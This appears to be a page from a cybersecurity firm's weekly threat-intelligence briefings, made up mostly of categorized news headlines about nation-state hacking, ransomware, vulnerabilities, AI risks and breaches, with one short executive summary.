Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

RedNovember Hackers Attacking Government and Technology Organizations to Deploy Backdoor - Cyber Security News

Cables no thicker than a hose, our perilous internet could be brought down in a snip | The Independent

UK needs better defences to protect undersea internet cables from Russian sabotage | Computer Weekly

New Chinese Espionage Hacking Group Uncovered

Suspected Chinese spies broke into 'numerous' enterprises • The Register

Nation State Actors

China

Suspected Chinese spies broke into 'numerous' enterprises • The Register

Japan to subsidize undersea cable vessels over 'very serious' national security concerns — will front up to half the cost for $300 million vessels bought by NEC | Tom's Hardware

New Chinese Espionage Hacking Group Uncovered

‘Most Prevalent’ Chinese Hacking Group Targets Tech, Law Firms

Chinese Hackers RedNovember Target Global Governments Using Pantegana and Cobalt Strike

Telecom exec: Salt Typhoon inspiring other hackers to use unconventional techniques | CyberScoop

SEO Poisoning Campaign Tied to Chinese Actor

China’s plans for supersize embassy spark surveillance, hacking fears in London - The Washington Post

Trump says Michael Dell is part of the team buying TikTok • The Register

Dropping China spying charges leaves Commons open to espionage, says Speaker - BBC News

Chinese Cyberspies Hacked US Defense Contractors - SecurityWeek

Russia

Cables no thicker than a hose, our perilous internet could be brought down in a snip | The Independent

UK needs better defences to protect undersea internet cables from Russian sabotage | Computer Weekly

Was the chancellor right to accuse Russia of being behind recent UK cyber attacks? | ITV News

UK chancellor blames cyberattacks on Russia despite evidence • The Register

Turla and Gamaredon Working Together in Fresh Ukrainian Intrusions - SecurityWeek

Russian State Hackers Collaborate in Attacks Against Ukraine - Infosecurity Magazine

Russia Targets Moldovan Election in Disinformation Play

Spanish military jet carrying defence minister hit with 'cyber attack' near Russia - JOE.co.uk

Russia's main airport in St. Petersburg says its website was hacked | The Record from Recorded Future News

Researchers say media outlet targeting Moldova is a Russian cutout | CyberScoop

Iran

Nimbus Manticore Deploys New Malware Targeting Europe - Check Point Research

Iran-Linked Hackers Target Europe With New Malware

Iranian State APT Blitzes Telcos & Satellite Companies

Flushable wipes and Iran: Water treatment facility adds cyberattacks to worry list : NPR

North Korea

What to do if your company discovers a North Korean worker in its ranks | CyberScoop

How hiring fraud has become a cybersecurity threat vector | Biometric Update

Lazarus RAT code resurfaces in North Korean IT-worker scams • The Register

DPRK Hackers Use ClickFix to Deliver BeaverTail Malware in Crypto Job Scams

North Korean IT workers use fake profiles to steal crypto - Help Net Security

Calls grow for cybersecurity control tower - The Korea Times

North Korean Hackers Use New AkdoorTea Backdoor to Target Global Crypto Developers

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

Hate Groups Seize on Trump’s Antifa Order With Online Threats

Tools and Controls

AI is altering entry-level cyber hiring — and the nature of the skills gap | CSO Online

New EDR-Freeze tool uses Windows WER to suspend security software

Gartner: Preemptive cybersecurity to dominate 50% of security spend by 2030 - Help Net Security

Gartner: CISOs must master agentic AI and turn hype into strategy

Cyber Threat Detection Vendors Pull Out of MITRE Evaluations Test - Infosecurity Magazine

Lean Teams, Higher Stakes: Why CISOs Must Rethink Incident Remediation

5 ways to spot software supply chain attacks and stop worms - before it's too late | ZDNET

10 Common Network Vulnerabilities That Could Put Your Business At Risk - Security Boulevard

North Korean Hackers Use New AkdoorTea Backdoor to Target Global Crypto Developers

Predicting DDoS attacks: How deep learning could give defenders an early warning - Help Net Security

How AI augmentation is revolutionizing penetration testing in cybersecurity | TechRadar

Beware Falling Into the Technology-First Resilience Trap

Anything but safe: Using VPN can bear immense risks – DW – 09/20/2025

DoD issues replacement for risk management framework - Breaking Defense

When calling for help isn't a claim: A new era for small biz cyber support | Insurance Business America

Brit banking group insists security priority in AI rollout • The Register

Other News

Cables no thicker than a hose, our perilous internet could be brought down in a snip | The Independent

UK needs better defences to protect undersea internet cables from Russian sabotage | Computer Weekly

Sky News Daily podcast asks if Britain's suffering a cyber attack 'epidemic' and who could be targeted next | News UK Video News | Sky News

Japan to subsidize undersea cable vessels over 'very serious' national security concerns — will front up to half the cost for $300 million vessels bought by NEC | Tom's Hardware

Why hackers are targeting the world's shipping - BBC News

Cyber attacks impacting trust in online retail - survey

Three in four European companies are hooked on US tech • The Register

The diplomacy of emerging tech and cross–border data sharing

As Incidents Rise, Japan's Cybersecurity Falls Short

Retail at risk: How one alert uncovered a persistent cyberthreat | Microsoft Security Blog

Austria military ditches Microsoft for open-source LibreOffice - here's why | ZDNET

Avoiding service desk exploitation: deconstructing the modern retail attack | TechRadar

Vulnerability Management

Critical Security Flaws Grow with AI Use, New Report Shows - Infosecurity Magazine

10 Common Network Vulnerabilities That Could Put Your Business At Risk - Security Boulevard

How to get free Windows 10 security updates through October 2026 | ZDNET

Microsoft pressured to extend free Windows 10 security updates in most of Europe

Microsoft Accepts to Make Windows 10 Extended Security Updates Free for EU Consumers

Vulnerabilities

Azure Entra ID Flaw Highlights Microsoft IAM Issues

SolarWinds fixes critical Web Help Desk RCE vulnerability (CVE-2025-26399) - Help Net Security

Federal agencies given one day to patch exploited Cisco firewall bugs | The Record from Recorded Future News

Cisco Firewall Zero-Days Exploited in China-Linked ArcaneDoor Attacks - SecurityWeek

Urgent: Cisco ASA Zero-Day Duo Under Attack; CISA Triggers Emergency Mitigation Directive

Cisco's Wave of Zero-Day Bugs Targets Firewalls, IOS

Hacker Deploys 'OVERSTEP' Backdoor in SonicWall Attack

Microsoft Patches Critical Entra ID Flaw Enabling Global Admin Impersonation Across Tenants

SonicWall Updates SMA 100 Appliances to Remove Overstep Malware - SecurityWeek

Two New Supermicro BMC Bugs Allow Malicious Firmware to Evade Root of Trust Security

Microsoft finally squashed this major Windows 11 24H2 bug - one year later | ZDNET

Critical Vulnerability in Salesforce AgentForce Exposed - Infosecurity Magazine

Salesforce Patches Critical ForcedLeak Bug Exposing CRM Data via AI Prompt Injection

Battered by cyberattacks, Salesforce faces a trust problem - and a potential class action lawsuit | ZDNET

Fortra Patches Critical GoAnywhere MFT Vulnerability - SecurityWeek

Final Chrome 140 update fixes more security vulnerabilities | PCWorld

Hackers Exploit Pandoc CVE-2025-51591 to Target AWS IMDS and Steal EC2 IAM Credentials

Two Critical Flaws Uncovered in Wondershare RepairIt Exposing User Data and AI Models

Unpatched flaw in OnePlus phones lets rogue apps text messages

CISA says hackers breached federal agency using GeoServer exploit

Nation-State hackers exploit Libraesva Email Gateway flaw

Sector Specific

Industry specific threat intelligence reports are available.

· Automotive

· Construction

· Critical National Infrastructure (CNI)

· Defence & Space

· Education & Academia

· Energy & Utilities

· Estate Agencies

· Financial Services

· FinTech

· Food & Agriculture

· Gaming & Gambling

· Government & Public Sector (including Law Enforcement)

· Health/Medical/Pharma

· Hotels & Hospitality

· Insurance

· Legal

· Manufacturing

· Maritime & Shipping

· Oil, Gas & Mining

· OT, ICS, IIoT, SCADA & Cyber-Physical Systems

· Retail & eCommerce

· Small and Medium Sized Businesses (SMBs)

· Startups

· Telecoms

· Third Sector & Charities

· Transport & Aviation

· Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Black Arrow Admin 21/09/2025 Black Arrow Admin 21/09/2025

Black Arrow Cyber Threat Intelligence Briefing 19 September 2025

Black Arrow Cyber Threat Intelligence Briefing 19 September 2025:

-Jaguar Land Rover Extends Shutdown After Cyber Attack by Another Week

-Two Scattered Spider Teens Charged over Attack on London’s Transport Network

-Scattered Spider Resurfaces with Financial Sector Attacks Despite Retirement Claims

-It Doesn’t Take a Genius to Be a Cybercriminal, and Open Source Ransomware Is Making It Easier than Ever

-New Android Malware Steals Your Money Then Installs Ransomware

-Disrupted Phishing Service Was After Microsoft 365 Credentials

-AI Threats Top Focus at London Financial Services Summit

-Shadow AI Is Breaking Corporate Security from Within

-Global Hiring Risks: Identity Fraud and Screening Trends

-Cyber Skills Shortage Forces 64% of EMEA Organisations into Risky Security Shortcuts

-70% of Security Leaders Say Internal Misalignment Creates More Chaos Than Threat Actors

-The Secret Psychological Cost of Cyber Attacks

-Russia’s Hybrid Tactics Raise Alarm in EU

Executive Summary

This week’s review highlights the growing complexity of cyber threats and the leadership response required.

Ransomware and phishing remain dominant, with major disruptions at Jaguar Land Rover and Transport for London. Criminal groups such as Scattered Spider are evolving, using AI-driven social engineering, while open-source ransomware and hybrid malware lower the barrier for attackers.

AI is both a defensive tool and a risk factor: financial services leaders warn of deepfake-enabled fraud, while unapproved AI use within organisations is driving compliance breaches and supply chain exposure. Internal weaknesses amplify these risks: research shows poor incident coordination and skills shortages create more disruption than attackers, while identity fraud in hiring and the psychological toll on staff add long-term challenges. Geopolitical tensions further complicate the landscape, with Russia escalating hybrid tactics across Europe.

Clear Board-level ownership and governance, a proactive investment in a security culture, and regular rehearsals of cyber incident management are essential to resilience. Contact us for impartial and objective leadership guidance on strengthening your organisation’s defences.

Governance, Risk and Compliance

The Evolving Role of the CISO: From Security Experts to Strategic Comm - Infosecurity Magazine

Cyber Resilience Confidence vs. Capability Gap: Are Organizations Prepared? | Dell

Geopolitics Reshapes Security Budgets in Financial Services

Security Execs Say Internal Mayhem Makes Cyber Attacks Worse

70% of Security Leaders Say Internal Misalignment Creates More Chaos Than Threat Actors: Cytactic's 2025 State of Cybersecurity Incident Response Management (CIRM) Report

5 trends reshaping IT security strategies today | CSO Online

Cyber leaders must make better use of risk experts | Computer Weekly

The secret psychological cost of cyberattacks

Cyber professionals are losing sleep over late night attacks | IT Pro

Creating a compliance strategy that works across borders - Help Net Security

How CISOs Can Drive Effective AI Governance

Threats

Ransomware, Extortion and Destructive Attacks

Beware! New Android malware steals your money then installs ransomware | PCWorld

Scattered Spider hackers return to hit more victims - despite retirement claims | TechRadar

Did Scattered Spider Scatter? Cyber Experts Are Skeptical | Security Magazine

Scattered LAPSUS$ Hunters Announces Closure - GovInfoSecurity

What Are The Takeaways from The Scattered Lapsus $Hunters Statement?

HybridPetya ransomware dodges UEFI Secure Boot • The Register

Hackers behind Jaguar Land Rover announce their 'retirement' – should we believe them? | IT Pro

It doesn't take a genius to be a cybercriminal - and open source ransomware is making it easier than ever | TechRadar

Open-Source Ransomware Tools on GitHub Fuel AI-Driven Cybercrime Surge

How ransomware is changing to target businesses in 2025 | IT Pro

Ransomware crims broke in, found recovery codes in plaintext • The Register

Ransomware attackers used incorrectly stored recovery codes to disable EDR agents - Help Net Security

Ransomware and the UK’s proposed ban on payments: a measured legal response or risk amplifier? | TechRadar

UK arrests 'Scattered Spider' teens linked to Transport for London hack

Ransomware TMZ: More Than a Year of Leaks, Lies and Betrayals | MSSP Alert

Ransomware Victims

Scattered Spider Resurfaces With Financial Sector Attacks Despite Retirement Claims

Scattered Spider gang feigns retirement, breaks into bank • The Register

Jaguar Land Rover suppliers 'face bankruptcy' due to hack crisis - BBC News

Cyber attack could be costing JLR £5 million a day | Autocar

JLR extends production shutdown to next week amid cyber attack chaos | TheBusinessDesk.com

JLR still unable to restart production as MPs call for government help | Autocar

VC firm Insight Partners says thousands of staff and limited partners had personal data stolen in a ransomware attack | TechCrunch

JLR ‘cyber shockwave ripping through UK industry’ as supplier share price plummets by 55% – DataBreaches.Net

JLR supply chain staff told to apply for universal credit, union says - BBC News

VC giant Insight Partners warns thousands after ransomware breach

ShinyHunters claims 1.5 billion Salesforce records stolen in Drift hacks

FBI Issues Salesforce Instance Warning Over 'ShinyHunters' Data Theft | Salesforce Ben

BMW claimed by Everest ransomware groupBMW claimed by Everest gang: Have luxury brands become the latest ransomware trend? | Cybernews

UK arrests 'Scattered Spider' teens linked to Transport for London hack

INC ransom group claimed the breach of Panama’s Ministry of Economy and Finance

Tiffany Data Breach Impacts Thousands of Customers - SecurityWeek

UK telco Colt’s cyberattack recovery seeps into November • The Register

ShinyHunters Attack National Credit Information Center of Vietnam

KillSec Ransomware Hits Brazil's Healthcare Sector

Qilin ransomware gang claims attack on Orleans Parish Sheriff's Office

Survival Flight reports second cybersecurity incident in less than a year – DataBreaches.Net

Phishing & Email Based Attacks

Scary results as study shows AI chatbots excel at phishing tactics - Cryptopolitan

Disrupted phishing service was after Microsoft 365 credentials | Malwarebytes

Threat Actors Leverage Several RMM Tools in Phishing Attack to Maintain Remote Access

Attackers Up Their Game with Ultra-Realistic PDF Invoice Lures, HP Finds | WebWire

Beware Email Scams Seeking Feedback on the UK's Emergency Alerts Test - ISPreview UK

This North Korean Phishing Attack Used ChatGPT's Image Generation

Phishing campaign targets Rust developers - Help Net Security

RaccoonO365 Phishing Network Dismantled as Microsoft, Cloudflare Take Down 338 Domains

Other Social Engineering

Why You Should Never Scan A QR Code To Pay For Parking

Password1: how scammers exploit variations of your logins | Money | The Guardian

Cybercriminals Have a Weird New Way to Target You With Scam Texts | WIRED

Fraud, Scams and Financial Crime

Why You Should Never Scan A QR Code To Pay For Parking

Cybercriminals Have a Weird New Way to Target You With Scam Texts | WIRED

Google nukes 224 Android malware apps behind massive ad fraud campaign

AI made crypto scams far more dangerous - Help Net Security

Beware Email Scams Seeking Feedback on the UK's Emergency Alerts Test - ISPreview UK

The Boots Bandits: How 'points thieves' are stealing loyalty card rewards from British shoppers in £300million black market | Daily Mail Online

AI-Powered Sign-up Fraud Is Scaling Fast

Cybersecurity in Ukraine: new fraud schemes and how to protect yourself | УНН

Google confirms fraudulent account created in law enforcement portal

Artificial Intelligence

Scary results as study shows AI chatbots excel at phishing tactics - Cryptopolitan

Shadow AI is breaking corporate security from within - Help Net Security

AI Threats Top Focus at London Financial Services Summit

AI made crypto scams far more dangerous - Help Net Security

AI-Powered Sign-up Fraud Is Scaling Fast

Open-Source Ransomware Tools on GitHub Fuel AI-Driven Cybercrime Surge

5 trends reshaping IT security strategies today | CSO Online

Hacker Exploits Claude AI to Automate Cyberattacks on 17 Companies

Rising DNS Cyber Attacks: AI-Driven Threats Demand Zero-Trust Defenses

Most enterprise AI use is invisible to security teams - Help Net Security

AI-Powered Villager Pen Testing Tool Hits 11,000 PyPI Downloads Amid Abuse Concerns

Democratizing AI: Balancing Innovation, Risks in ChatGPT Era

Opinion | AI and drone warfare is here. The U.S. isn’t ready. - The Washington Post

A Quarter of UK and US Firms Suffer Data Poisoning Attacks - Infosecurity Magazine

This North Korean Phishing Attack Used ChatGPT's Image Generation

AI-Forged Military IDs Used in North Korean Phishing Attack - Infosecurity Magazine

New attack on ChatGPT research agent pilfers secrets from Gmail inboxes - Ars Technica

LinkedIn now uses your data for AI by default, opt out now! - Help Net Security

How CISOs Can Drive Effective AI Governance

AI video surveillance could end privacy as we know it - Help Net Security

Cloudflare CEO’s 'Frighteningly Likely' Forecast for How AI Will Ruin the Internet

Malware

CrowdStrike Infested With "Self-Replicating Worms"

Self-Replicating Worm Hits 180+ npm Packages to Steal Credentials in Latest Supply Chain Attack

Old file types, new tricks: Attackers turn everyday files into weapons - Help Net Security

Attackers Adopting Novel LOTL Techniques to Evade Detection - Infosecurity Magazine

The unseen side of malware and how to find it - Help Net Security

HiddenGh0st, Winos and kkRAT Exploit SEO, GitHub Pages in Chinese Malware Attacks

China-linked Mustang Panda deploys advanced SnakeDisk USB worm

Linux Security Tools Bypassed by io_uring Rootkit Technique, ARMO Research Reveals - InfoQ

HybridPetya: A Petya/NotPetya copycat comes with a twist

SilentSync RAT Delivered via Two Malicious PyPI Packages Targeting Python Developers

CountLoader Broadens Russian Ransomware Operations With Multi-Version Malware Loader

Bitdefender discovers China-linked malware - APDR

SEO Poisoning Targets Chinese Users with Fake Software Sites - Infosecurity Magazine

Sophisticated Cyber Campaign Deploys RATs via SEO-Poisoned GitHub Sites

Threat Actor Infests Hotels With New RAT - SecurityWeek

Mobile

Beware! New Android malware steals your money then installs ransomware | PCWorld

Cybercriminals Have a Weird New Way to Target You With Scam Texts | WIRED

Google nukes 224 Android malware apps behind massive ad fraud campaign

Google has made a huge change to the monthly Android Security Bulletin - PhoneArena

Apple addresses dozens of vulnerabilities in latest software for iPhones, iPads and Macs | CyberScoop

Apple backports zero-day patches to older iPhones and iPads

Google may shift to risk-based Android security patch rollouts - what that means for you | ZDNET

1 in 3 Android Apps Leak Sensitive Data - Infosecurity Magazine

Ex-WhatsApp cybersecurity executive says Meta endangered billions of users in new suit – DataBreaches.Net

Samsung patches actively exploited zero-day reported by WhatsApp

Make Sure Your Android Phone Has This Security Feature Enabled (And Here's Why)

CERT-FR: Take Apple spyware alerts seriously | Cybernews

Denial of Service/DoS/DDoS

Cloudflare DDoSed itself with React useEffect hook blunder • The Register

Internet of Things – IoT

Dutch University Washing Machines Hacked, Disrupting Laundry for 1,200 Students

Smart Home Security Tips to Prevent Hacking

Data Breaches/Leaks

VC firm Insight Partners says thousands of staff and limited partners had personal data stolen in a ransomware attack | TechCrunch

ShinyHunters claims 1.5 billion Salesforce records stolen in Drift hacks

FBI Issues Salesforce Instance Warning Over 'ShinyHunters' Data Theft | Salesforce Ben

SonicWall Discloses Compromise of Cloud Backup Service - Infosecurity Magazine

Attack on SonicWall’s cloud portal exposes customers’ firewall configurations | CyberScoop

SonicWall warns customers to reset credentials after breach

1 in 3 Android Apps Leak Sensitive Data - Infosecurity Magazine

British rail passengers urged to stay on guard after hack signals failure

Tiffany Data Breach Impacts Thousands of Customers - SecurityWeek

Gucci, Balenciaga and Alexander McQueen targeted in cyber-attack

Hackers steal millions of Gucci, Balenciaga, and Alexander McQueen customer records

Millions of HNW clients at risk as Gucci hacked | Insurance Business America

Insider breach at FinWise Bank exposes data of 689,000 AFF customers

Cybercriminals pwn 850k+ Americans' healthcare data • The Register

New York Blood Center Alerts 194,000 People to Data Breach - Infosecurity Magazine

Vietnam data breach: whole population exposed | Cybernews

2 Eye Care Practice Hacks Affect 260,000 Patients, Staff

Bracknell and Wokingham college hit with cyber attack | Bracknell News

Organised Crime & Criminal Actors

Cyber professionals are losing sleep over late night attacks | IT Pro

Cybercriminals Evolve Tactics: New HP Report Reveals Sophisticated Threats

Open-Source Ransomware Tools on GitHub Fuel AI-Driven Cybercrime Surge

It doesn't take a genius to be a cybercriminal - and open source ransomware is making it easier than ever | TechRadar

Cyber-scam camp operators shifting to vulnerable countries • The Register

DOJ Resentences BreachForums Founder to 3 Years for Cybercrime and Possession of CSAM

NCA Singles Out “The Com” as it Chairs Five Eyes Group - Infosecurity Magazine

The Feds Destroyed an Internet Weapon, but Criminals Picked Up the Pieces - WSJ

The Boots Bandits: How 'points thieves' are stealing loyalty card rewards from British shoppers in £300million black market | Daily Mail Online

15 ransomware gangs ‘go dark’ to enjoy 'golden parachutes' • The Register

"Pompompurin" resentenced: BreachForums creator heads back behind bars

Fifteen Ransomware Gangs “Retire,” Future Unclear - Infosecurity Magazine

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

AI made crypto scams far more dangerous - Help Net Security

Suspect in Coinbase hack kept data for more than 10,000 customers on her phone, court filing alleges | Fortune Crypto

Insider Risk and Insider Threats

The secret psychological cost of cyberattacks

Insider breach at FinWise Bank exposes data of 689,000 AFF customers

Engineer Who Tried To Pass Secrets To Russia Gets 10½ Years - Law360

Man convicted for attempting to give classified information on US Air Force systems to Russia - ABC News

Supply Chain and Third Parties

CrowdStrike Infested With "Self-Replicating Worms"

Self-Replicating Worm Hits 180+ npm Packages to Steal Credentials in Latest Supply Chain Attack

New supply chain attack hits npm registry, compromising 40+ packages

Mitigating supply chain vulnerabilities | TechRadar

Cloud/SaaS

Attack on SonicWall’s cloud portal exposes customers’ firewall configurations | CyberScoop

Disrupted phishing service was after Microsoft 365 credentials | Malwarebytes

Microsoft scores win against Office 365 credential thieves | Computer Weekly

The Cloud Edge Is the New Attack Surface

The unseen risk in Microsoft 365: disaster recovery | IT Pro

Target-rich environment: Why Microsoft 365 has become the biggest risk

Outages

Starlink outage knocks tens of thousands offline worldwide • The Register

Linux and Open Source

Linux Security Tools Bypassed by io_uring Rootkit Technique, ARMO Research Reveals - InfoQ

UEFI Secure Boot for Linux Arm64 – where do we stand? • The Register

Passwords, Credential Stuffing & Brute Force Attacks

Disrupted phishing service was after Microsoft 365 credentials | Malwarebytes

Microsoft scores win against Office 365 credential thieves | Computer Weekly

SonicWall Discloses Compromise of Cloud Backup Service - Infosecurity Magazine

SonicWall warns customers to reset credentials after breach

Password1: how scammers exploit variations of your logins | Money | The Guardian

Social Media

TikTok Deal Won't End Enterprise Risks

Facebook's settlement payments are on the way - here's how much you can expect | ZDNET

LinkedIn now uses your data for AI by default, opt out now! - Help Net Security

Australia to let Big Tech choose kids social media ban tech • The Register

Regulations, Fines and Legislation

Ransomware and the UK’s proposed ban on payments: a measured legal response or risk amplifier? | TechRadar

EU’s NIS2 directive brings tougher cybersecurity rules - The Recycler

UK ministers probe 'child-protection' Online Safety tweaks • The Register

China: 1-hour deadline on serious cyber incident reporting • The Register

Creating a compliance strategy that works across borders - Help Net Security

A Deeper Dive: The SEC Cybersecurity Rule Enforcement Landscape | BakerHostetler - JDSupra

Australia to let Big Tech choose kids social media ban tech • The Register

The CMMC Rule is Here: What Contractors Need to Know | Akin Gump Strauss Hauer & Feld LLP - JDSupra

CISA misspent millions in cyber skill retention funds: audit • The Register

CISA attempts to assert control over CVE in vision outline • The Register

Without Federal Help, Cyber Defense Is Up to Us

The Next Cyber Breach Will Not Wait: Why Congress Must Reauthorize CISA 2015

CISA blasted by US watchdog for wasting funds and retaining the wrong employees | TechRadar

The Quality Era: How CISA’s Roadmap Reflects Urgency for Modern Cybersecurity - Security Boulevard

Agencies increasingly dive into AI for cyber defense, acting federal CISO says | CyberScoop

Models, Frameworks and Standards

EU’s NIS2 directive brings tougher cybersecurity rules - The Recycler

NCSC updates Cyber Assessment Framework (2) | UKAuthority

The CMMC Rule is Here: What Contractors Need to Know | Akin Gump Strauss Hauer & Feld LLP - JDSupra

Department of Defense Finalizes Long-Awaited Cybersecurity Rule | Morrison & Foerster LLP - Government Contracts Insights - JDSupra

Careers, Working in Cyber and Information Security

Cyber Skills Shortage Forces 64% of EMEA Organisations into Risky Security Shortcuts

Organisations still struggling to close cybersecurity skills gap

Cybersecurity: The job that comes with a daily dose of ‘impending doom’

Cyber hiring trends | Professional Security Magazine

Microsoft Principal Security Engineer on How to Get Into Cybersecurity - Business Insider

Law Enforcement Action and Take Downs

DOJ Resentences BreachForums Founder to 3 Years for Cybercrime and Possession of CSAM

NCA Singles Out “The Com” as it Chairs Five Eyes Group - Infosecurity Magazine

Hackers behind Jaguar Land Rover announce their 'retirement' – should we believe them? | IT Pro

UK arrests two teens accused of heavy involvement in yearslong Scattered Spider attack spree | CyberScoop

"Pompompurin" resentenced: BreachForums creator heads back behind bars

Engineer Who Tried To Pass Secrets To Russia Gets 10½ Years - Law360

Man convicted for attempting to give classified information on US Air Force systems to Russia - ABC News

Suspect in Coinbase hack kept data for more than 10,000 customers on her phone, court filing alleges | Fortune Crypto

Man gets over 4 years in prison for selling unreleased movies

Europol adds Spanish academic suspected of aiding pro-Russian hackers to most wanted list | The Record from Recorded Future News

RaccoonO365 Phishing Network Dismantled as Microsoft, Cloudflare Take Down 338 Domains

Misinformation, Disinformation and Propaganda

Opinion | AI and drone warfare is here. The U.S. isn’t ready. - The Washington Post

Russian fake-news network back in action with 200+ new sites • The Register

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

Russia’s Hybrid Tactics Raise Alarm in EU

Opinion | AI and drone warfare is here. The U.S. isn’t ready. - The Washington Post

Geopolitics Reshapes Security Budgets in Financial Services

Bitdefender discovers China-linked malware - APDR

Nation State Actors

Opinion | AI and drone warfare is here. The U.S. isn’t ready. - The Washington Post

Geopolitics Reshapes Security Budgets in Financial Services

China

China-linked APT41 targets government, think tanks, and academics tied to US-China trade and policy

China: 1-hour deadline on serious cyber incident reporting • The Register

HiddenGh0st, Winos and kkRAT Exploit SEO, GitHub Pages in Chinese Malware Attacks

China-linked Mustang Panda deploys advanced SnakeDisk USB worm

TikTok Deal Won't End Enterprise Risks

Chinese cyber skirmishes in the Indo-Pacific show emerging patterns of conflict | The Strategist

Bitdefender discovers China-linked malware - APDR

The countdown is on - Chinese firms now have just an hour to report cybersecurity incidents | TechRadar

SEO Poisoning Targets Chinese Users with Fake Software Sites - Infosecurity Magazine

Sophisticated Cyber Campaign Deploys RATs via SEO-Poisoned GitHub Sites

Costs of Russian, Chinese cyberattacks on German firms on rise: report

Russia

Russia’s Hybrid Tactics Raise Alarm in EU

Opinion | AI and drone warfare is here. The U.S. isn’t ready. - The Washington Post

MI6 launches dark web portal to attract spies in Russia - BBC News

Researchers believe Gamaredon and Turla threat groups are collaborating - Help Net Security

Russian fake-news network back in action with 200+ new sites • The Register

Europol adds Spanish academic suspected of aiding pro-Russian hackers to most wanted list | The Record from Recorded Future News

Ukrainian Cyberattack Paralyzes Russia’s Sham Election in Occupied Crimea

Engineer Who Tried To Pass Secrets To Russia Gets 10½ Years - Law360

Man convicted for attempting to give classified information on US Air Force systems to Russia - ABC News

CountLoader Broadens Russian Ransomware Operations With Multi-Version Malware Loader

Russian regional airline disrupted by suspected cyberattack | The Record from Recorded Future News

Iran

What's Old Is New Again as Iranian Hackers Exploit Macros

North Korea

This North Korean Phishing Attack Used ChatGPT's Image Generation

AI-Forged Military IDs Used in North Korean Phishing Attack - Infosecurity Magazine

Proton Mail Suspended Journalist Accounts at Request of Cybersecurity Agency

Tools and Controls

Geopolitics Reshapes Security Budgets in Financial Services

SonicWall Discloses Compromise of Cloud Backup Service - Infosecurity Magazine

Attack on SonicWall’s cloud portal exposes customers’ firewall configurations | CyberScoop

The Cloud Edge Is the New Attack Surface

The unseen risk in Microsoft 365: disaster recovery | IT Pro

Rising DNS Cyber Attacks: AI-Driven Threats Demand Zero-Trust Defenses

AI-Powered Villager Pen Testing Tool Hits 11,000 PyPI Downloads Amid Abuse Concerns

Threat Actors Leverage Several RMM Tools in Phishing Attack to Maintain Remote Access

Ransomware attackers used incorrectly stored recovery codes to disable EDR agents - Help Net Security

Security Execs Say Internal Mayhem Makes Cyber Attacks Worse

70% of Security Leaders Say Internal Misalignment Creates More Chaos Than Threat Actors: Cytactic's 2025 State of Cybersecurity Incident Response Management (CIRM) Report

Cyber leaders must make better use of risk experts | Computer Weekly

Zero Trust Is 15 Years Old — Why Full Adoption Is Worth the Struggle - SecurityWeek

CISOs grapple with the realities of applying AI to security functions | CSO Online

Many networking devices are still vulnerable to pixie dust attack - Help Net Security

News alert: Palo Alto flags threats that evade Secure Web Gateways — echoing SquareX research - Security Boulevard

Elon Musk Urges Heightened Security After Charlie Kirk Assassination

SilentSync RAT Delivered via Two Malicious PyPI Packages Targeting Python Developers

Phishing campaign targets Rust developers - Help Net Security

3 reasons VPN use is set to explode worldwide - and that might apply to you | ZDNET

More tools lead to greater risk of security issues and burnout - BetaNews

How Top CISOs Approach Exposure Management in the Context of Managing Cyber Risk - Security Boulevard

Digital twins give cyber defenders a predictive edge - SiliconANGLE

UEFI Secure Boot for Linux Arm64 – where do we stand? • The Register

How CISOs Can Drive Effective AI Governance

What is Mobile Threat Defense (MTD)? | Definition from TechTarget

A third of UK firms using ‘bossware’ to monitor workers’ activity, survey reveals | Privacy | The Guardian

Other News

News alert: Palo Alto flags threats that evade Secure Web Gateways — echoing SquareX research - Security Boulevard

3 reasons VPN use is set to explode worldwide - and that might apply to you | ZDNET

Europe needs to wake up to its internet network vulnerability

Kids hacking for kicks are causing security headaches at schools | IT Pro

Cyber resilience must be engineered into the UK’s infrastructure future | New Civil Engineer

What is Hardware Security? | Definition from TechTarget

Vulnerability Management

Google has made a huge change to the monthly Android Security Bulletin - PhoneArena

Microsoft reminds of Windows 10 support ending in 30 days

Payment System Vendor Took Year+ to Patch Infinite Card Top-Up Hack: Security Firm - SecurityWeek

Microsoft: Exchange 2016 and 2019 reach end of support in 30 days

Microsoft Warns 200 Million Windows Users—Do Not Update Your PC

Consumer Reports calls Microsoft 'hypocritical' for stranding millions of Windows 10 PCs | ZDNET

CISA attempts to assert control over CVE in vision outline • The Register

Exploring Open Source and Compliance in Vulnerability Management - Security Boulevard

Vulnerabilities

Google patches another worrying Chrome security flaw - so update now, or be at risk | TechRadar

Ransomware attackers used incorrectly stored recovery codes to disable EDR agents - Help Net Security

Many networking devices are still vulnerable to pixie dust attack - Help Net Security

Apple addresses dozens of vulnerabilities in latest software for iPhones, iPads and Macs | CyberScoop

Apple backports zero-day patches to older iPhones and iPads

Ransomware crims broke in, found recovery codes in plaintext • The Register

Cisco fixes high-severity IOS XR flaws enabling image bypass and DoS

Phoenix RowHammer Attack Bypasses Advanced DDR5 Memory Protections in 109 Seconds

Google Patches Chrome Zero-Day CVE-2025-10585 as Active V8 Exploit Threatens Millions

Update your Samsung phone ASAP to patch this zero-day flaw exploited in the wild | ZDNET

CISA Warns of Two Malware Strains Exploiting Ivanti EPMM CVE-2025-4427 and CVE-2025-4428

Samsung patches actively exploited zero-day reported by WhatsApp

CISA warns of actively exploited Dassault RCE vulnerability

Microsoft says Windows September updates break SMBv1 shares

Sector Specific

Industry specific threat intelligence reports are available.

· Automotive

· Construction

· Critical National Infrastructure (CNI)

· Defence & Space

· Education & Academia

· Energy & Utilities

· Estate Agencies

· Financial Services

· FinTech

· Food & Agriculture

· Gaming & Gambling

· Government & Public Sector (including Law Enforcement)

· Health/Medical/Pharma

· Hotels & Hospitality

· Insurance

· Legal

· Manufacturing

· Maritime & Shipping

· Oil, Gas & Mining

· OT, ICS, IIoT, SCADA & Cyber-Physical Systems

· Retail & eCommerce

· Small and Medium Sized Businesses (SMBs)

· Startups

· Telecoms

· Third Sector & Charities

· Transport & Aviation

· Web3

